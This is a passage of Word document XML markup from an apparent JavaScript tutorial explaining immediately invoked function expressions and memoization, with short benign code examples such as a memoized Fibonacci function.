          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">An </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Immediately Invoked Function Expression (IIFE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a function in JavaScript that is defined and executed immediately after it is created. IIFEs are commonly used to create a new scope and avoid polluting the global namespace, particularly when working with variables that should not be accessible outside the function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25728E24" w14:textId="77777777" w:rsidR="000027D4" w:rsidRPr="00DA2F32" w:rsidRDefault="000027D4" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Structure of an IIFE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C3BB25" w14:textId="77777777" w:rsidR="000027D4" w:rsidRPr="00DA2F32" w:rsidRDefault="000027D4" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>An IIFE is typically structured as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797D366F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539E489E"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Code inside the IIFE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A54BED2"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0296DEF"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Alternatively:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F54BB2F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409DB92A"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Code inside the IIFE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD557D8"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C9806A1" w14:textId="77777777" w:rsidR="000027D4" w:rsidRPr="00DA2F32" w:rsidRDefault="000027D4" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Characteristics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4356C8" w14:textId="77777777" w:rsidR="000027D4" w:rsidRPr="00DA2F32" w:rsidRDefault="000027D4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="222"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Self-Executing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05652016"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>An IIFE is a function that is defined and immediately executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138C8EFD"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The function is wrapped inside parentheses to ensure it is treated as an expression, not a declaration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12562CB8"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The () after the function definition immediately invokes the function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFE5A26" w14:textId="77777777" w:rsidR="000027D4" w:rsidRPr="00DA2F32" w:rsidRDefault="000027D4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="222"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoids Polluting the Global Scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED52C56"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Variables declared inside an IIFE are not accessible outside of it, which helps avoid conflicts with other scripts or variables in the global scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6312B27C"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This makes IIFEs particularly useful in environments where multiple scripts are loaded and variable names might collide.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5637AE" w14:textId="77777777" w:rsidR="000027D4" w:rsidRPr="00DA2F32" w:rsidRDefault="000027D4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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68EAD35E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BBB9AF"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message = "Hello, World!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CF1DB5"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console.log(message); // "Hello, World!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB365E5"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C58E46D"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93FE218"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console.log(message); // ReferenceError: message is not defined</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D18AE9" w14:textId="77777777" w:rsidR="000027D4" w:rsidRPr="00DA2F32" w:rsidRDefault="000027D4" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCADE78"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The variable message is defined inside the IIFE and cannot be accessed outside of it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C5628F"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This prevents message from being added to the global scope, avoiding potential naming conflicts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F62CDEE" w14:textId="77777777" w:rsidR="000027D4" w:rsidRPr="00DA2F32" w:rsidRDefault="000027D4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="222"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Passing Parameters to IIFEs</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C831654"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>IIFEs can accept parameters, allowing you to pass values to them at the time of invocation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA7F9E7"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(function(name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492AF2AD"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console.log(`Hello, ${name}!`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FACB5EF" w14:textId="77777777" w:rsidR="000027D4" w:rsidRPr="00DA2F32" w:rsidRDefault="000027D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})('Alice'); // "Hello, Alice!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCC588E" w14:textId="77777777" w:rsidR="000027D4" w:rsidRPr="00DA2F32" w:rsidRDefault="000027D4" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Here, 'Alice' is passed as an argument to the IIFE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6E2B69" w14:textId="77777777" w:rsidR="000027D4" w:rsidRPr="00DA2F32" w:rsidRDefault="000027D4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="222"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Common Uses</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56841D4E"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Private Variables and Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: IIFEs are often used to create private variables and functions that cannot be accessed from the global scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25652216"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Module Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: IIFEs form the basis of the module pattern in JavaScript, allowing you to create self-contained modules that expose only the necessary parts to the outside world.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D97D49" w14:textId="77777777" w:rsidR="000027D4" w:rsidRPr="00DA2F32" w:rsidRDefault="000027D4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="222"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Polyfills</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: IIFEs are also used to write polyfills, where only certain features are exposed to the global scope if they don’t already exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FDBCD5" w14:textId="77777777" w:rsidR="005A3D24" w:rsidRPr="00DA2F32" w:rsidRDefault="005A3D24" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EAEB63D" w14:textId="56CC96AA" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc178383250"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidR="005A3D24" w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>memorization</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="1B1F5C8D" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Memoization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a programming technique used to improve the performance of functions by storing the results of expensive function calls and reusing those results when the same inputs occur again. In JavaScript, memoization can be particularly useful for functions that are computationally intensive or called frequently with the same arguments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2E56CE" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How Memoization Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C4DE8D" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cache Storage</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9A862A" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Memoization uses a cache (usually an object) to store the results of function calls. The function arguments are used as keys to store and retrieve the results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F19C2EA" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When a function is called, it first checks if the result for the given arguments is already in the cache. If it is, the cached result is returned. If not, the function is executed, and the result is stored in the cache for future use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5753B0" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example without Memoization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0842FD69"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fibonacci(n) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D004B5D"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(n &lt;= 1) return n;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F57D453"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fibonacci(n - 1) + fibonacci(n - 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47794E11"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3B4BAD2"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76FB932"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console.log(fibonacci(10)); // 55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342081C4" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The fibonacci function is recursive and recalculates results for the same inputs multiple times, which is inefficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1F046F" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Example with Memoization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E04A22B"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memoize(fn) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CE06F7"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cache = {};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EE062D"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function(...args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6FBB05"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key = args.toString();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B66A462"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(cache[key]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBCF6D9"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cache[key];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B56EC54"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0B511FA"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result = fn(...args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7F9E40"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cache[key] = result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E6F5F5"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result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E76A9D2"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95DB3C3"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AC5E47A"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4DB15B4"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memoizedFibonacci = memoize(function(n) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DC7E1F"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(n &lt;= 1) return n;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDF3C08"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memoizedFibonacci(n - 1) + memoizedFibonacci(n - 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0EF7C3"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843F385"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1E1FC93"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console.log(memoizedFibonacci(10)); // 55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A36347" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In this example, memoize is a higher-order function that takes a function fn as an argument and returns a memoized version of that function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28246666" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The memoizedFibonacci function now checks the cache before performing the calculation, significantly improving performance for repeated calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17791519" w14:textId="77777777" w:rsidR="005A6249" w:rsidRPr="00DA2F32" w:rsidRDefault="005A6249" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
